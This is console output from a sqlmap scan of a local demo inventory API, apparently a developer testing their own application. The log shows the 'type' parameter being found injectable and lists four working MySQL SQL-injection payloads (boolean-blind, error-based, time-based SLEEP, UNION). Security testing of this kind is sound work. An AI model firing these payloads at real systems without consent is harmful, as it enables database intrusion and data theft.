        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.10.6#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:13:26 /2026-07-07/

[1/1] URL:
GET http://127.0.0.1:4000/api/demo/inventory-movements?type=IN&limit=100&offset=0
do you want to test this URL? [Y/n/q]
> Y
[22:13:26] [INFO] testing URL 'http://127.0.0.1:4000/api/demo/inventory-movements?type=IN&limit=100&offset=0'
[22:13:26] [INFO] flushing session file
[22:13:26] [INFO] using '/Users/vlada/.local/share/sqlmap/output/results-07072026_1013pm.csv' as the CSV results file in multiple targets mode
[22:13:26] [INFO] testing connection to the target URL
[22:13:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:13:26] [INFO] testing if the target URL content is stable
[22:13:26] [INFO] target URL content is stable
[22:13:26] [INFO] heuristic (basic) test shows that GET parameter 'type' might be injectable (possible DBMS: 'MySQL')
[22:13:26] [INFO] testing for SQL injection on GET parameter 'type'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n] Y
[22:13:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:13:27] [WARNING] reflective value(s) found and filtering out
[22:13:27] [INFO] GET parameter 'type' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[22:13:27] [INFO] testing 'Generic inline queries'
[22:13:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:13:27] [INFO] GET parameter 'type' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable 
[22:13:27] [INFO] testing 'MySQL inline queries'
[22:13:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[22:13:27] [WARNING] time-based comparison requires larger statistical model, please wait.................. (done)
[22:13:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[22:13:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[22:13:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[22:13:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[22:13:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[22:13:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[22:13:29] [INFO] GET parameter 'type' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[22:13:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:13:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:13:29] [INFO] target URL appears to be UNION injectable with 10 columns
[22:13:29] [INFO] GET parameter 'type' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'type' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 63 HTTP(s) requests:
---
Parameter: type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=IN' AND 6280=6280 AND 'BkFt'='BkFt&limit=100&offset=0

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: type=IN' AND EXTRACTVALUE(8717,CONCAT(0x5c,0x716b766b71,(SELECT (ELT(8717=8717,1))),0x716b717171)) AND 'pMGl'='pMGl&limit=100&offset=0

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: type=IN' AND (SELECT 1547 FROM (SELECT(SLEEP(1)))hnKl) AND 'CVPO'='CVPO&limit=100&offset=0

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: type=IN' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b766b71,0x5a59696162474f597349635050705779465843705a476e526d6b726a594e487a4a4f594e4352754e,0x716b717171),NULL,NULL,NULL,NULL-- -&limit=100&offset=0
---
do you want to exploit this SQL injection? [Y/n] Y
[22:13:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[22:13:29] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 35 times
[22:13:29] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/Users/vlada/.local/share/sqlmap/output/results-07072026_1013pm.csv'

[*] ending @ 22:13:29 /2026-07-07/

